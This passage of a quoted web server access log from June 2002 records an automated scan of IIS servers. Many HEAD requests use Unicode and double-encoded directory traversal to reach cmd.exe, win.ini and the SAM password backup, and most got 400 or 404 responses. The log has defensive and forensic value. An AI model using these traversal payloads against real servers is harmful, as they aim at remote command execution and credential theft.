> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /msadc/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /msadc/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /Rpc/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
400
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
"-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /samples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /samples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /samples/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /msadc/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /samples/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
>
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+d
> ir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /msadc/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /script/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /script/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
>
/PBServer/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/
> c+dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /PBServer/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /PBServer/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
"-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /PBServer/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /PBServer/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:11 +0200] "HEAD
> /PBServer/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
>
/scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:
> \ HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /Rpc/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /Rpc/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
>
/Rpc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /Rpc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /Rpc/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /Rpc/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
404
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /samples/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /samples/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /samples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
>
/samples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c
> +dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /script/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
>
/scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+di
> r HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
>
/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c
> +dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
>
/scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%
> 20C:\ HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
>
/script/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+
> dir HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
>
/_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd
> .exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
> /_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:12 +0200] "HEAD
>
/_mem_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/
> cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
>
/_mem_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+d
> ir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_mem_bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_mem_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_mem_bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
400
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_mem_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_mem_bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
400
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_mem_bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_mem_bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_mem_bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_mem_bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
>
/_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd
> .exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_bin/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
"-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
>
/_vti_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/
> cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_bin/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
"-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
>
/_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+d
> ir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
400
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_bin/..%u002f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
400
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_bin/..%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
>
/_vti_cnf/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd
> .exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
>
/_vti_cnf/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+d
> ir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:13 +0200] "HEAD
> /_vti_cnf/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /_vti_cnf/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /_vti_cnf/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /_vti_cnf/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /_vti_cnf/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /_vti_cnf/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /a.asp/.%u002e/.%u002e/.%u002e/.%u002e/winnt/win.ini HTTP/1.0" 400 0 "-"
"-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /a.asp/.%u002e/.%u002e/.%u002e/..\winnt\repair\sam._ HTTP/1.0" 400 0 "-"
"-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /a.asp/..%u00255c../..%u00255c../winnt/win.ini HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /a.asp/..%u00255c../..%u00255c..\winnt\repair\sam._ HTTP/1.0" 400 0 "-"
"-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /a.asp/..%u002f../..%u002f../winnt/win.ini HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /a.asp/..%u002f../..%u002f..\winnt\repair\sam._ HTTP/1.0" 400 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /a.asp/..%u005c../..%u005c../winnt/win.ini HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /a.asp/..%u005c../..%u005c..\winnt\repair\sam._ HTTP/1.0" 400 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
>
/adsamples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cm
> d.exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
>
/adsamples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+
> dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /adsamples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /adsamples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /adsamples/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /adsamples/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /adsamples/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /adsamples/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
>
/bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?
> /c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
"-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
"-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
>
/bin/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/
> cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:14 +0200] "HEAD
> /bin/scripts/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
>
/bin/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system
> 32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /bin/scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
>
/bin/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /bin/scripts/..%u002f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /bin/scripts/..%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
>
/bin/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
>
/cgi/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?
> /c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
"-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
"-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi-bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi-bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi-bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi-bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi-bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi-bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
